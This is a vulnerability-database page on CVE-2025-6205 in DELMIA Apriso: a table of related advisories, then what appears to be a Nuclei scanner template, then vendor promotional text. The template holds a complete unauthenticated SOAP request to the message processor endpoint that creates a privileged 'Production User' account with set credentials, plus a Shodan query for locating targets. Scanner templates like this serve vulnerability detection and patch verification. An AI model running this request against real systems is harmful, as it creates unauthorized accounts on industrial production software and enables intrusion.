| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the DELMIA Apriso production management system, related to deficiencies in the authentication process, allows a perpetrator to gain privileged access to the application. | 1 Jun 202600:00 | – | bdu_fstec | |
| CVE-2025-6205 | 4 Aug 202510:31 | – | circl | |
| Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability | 28 Oct 202500:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 28 Oct 202512:00 | – | cisa | |
| Dassault Systèmes DELMIA Apriso 安全漏洞 | 4 Aug 202500:00 | – | cnnvd | |
| CVE-2025-6205 | 4 Aug 202509:14 | – | cve | |
| CVE-2025-6205 Missing authorization vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 | 4 Aug 202509:14 | – | cvelist | |
| DELMIA Apriso Missing Authorization Vulnerability (CVE-2025-6205) | 5 Nov 202500:00 | – | nessus | |
| EUVD-2025-23493 | 4 Aug 202509:14 | – | euvd | |
| CVE-2025-6205 | 4 Aug 202510:15 | – | nvd |
id: CVE-2025-6205
info:
name: DELMIA Apriso - Broken Access Control
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: high
description: |
DELMIA Apriso Release 2020 through Release 2025 contains a broken access control vulnerability caused by missing authorization, letting attackers gain privileged access to the application, exploit requires no special conditions.
remediation: |
Apply security patches from DELMIA for Release 2020 through Release 2025 to address missing authorization checks on message processing endpoints.
impact: |
Unauthenticated attackers can create privileged user accounts with production access through missing authorization checks on the message processing endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6205
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6205
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
classification:
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
cvss-score: 8.8
cve-id: CVE-2025-6205
epss-score: 0.71059
epss-percentile: 0.99326
cwe-id: CWE-862
metadata:
verified: true
max-request: 1
shodan-query: title:"DELMIA Apriso"
tags: cve,cve2025,delmia,apriso,unauth,intrusive,vuln,kev,vkev
variables:
username: "LAST"
password: "9"
http:
- raw:
- |
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:ProcessMessageASync_v2>
<tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0"> 	<Employee> 		<GivenName>FIRST</GivenName> 		<FamilyName>LAST</FamilyName> 		<EmployeeNo>08262004</EmployeeNo> 		<LoginName>{{username}}</LoginName> 		<Password>{{password}}</Password> 		<HireDate>2000-06-01T00:00:00</HireDate> 		<SpokenLanguageID>1033</SpokenLanguageID> 		<WrittenLanguageID>1033</WrittenLanguageID> 		<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate> 		<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate> 		<EmployeeType>0</EmployeeType> 		<DefaultFacility>C1P1</DefaultFacility> 		<TrackLaborFlag>true</TrackLaborFlag> 		<ResourceID NodeType="Field"> 			<Resource_Insert> 				<Name>FIRST</Name> 				<ResourceName>FIRST</ResourceName> 				<ResourceType>1</ResourceType> 				<FUID NodeType="Field"/> 			</Resource_Insert> 		</ResourceID> 		<EmployeeRole> 			<EmployeeID NodeType="Field"/> 			<RoleID NodeType="Field"> 				<Role> 					<Role>Production User</Role> 				</Role> 			</RoleID> 		</EmployeeRole> 	</Employee> </FlexNet_Employees></tem:xmlMessage>
<tem:applicationName>myExternalApplication</tem:applicationName>
</tem:ProcessMessageASync_v2>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>
condition: and
extractors:
- type: dsl
dsl:
- '"Username: "+ username'
- '"Password: "+ password'
# digest: 4a0a00473045022100d04cfaf3f7b48942ca5bcb4b3c15e6c3502af1823c12cc69c6c615b4ecb3f236022017a92d771be4bf45418010480d0eeb11ad920e45344ee6982e87a7a237d56012:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation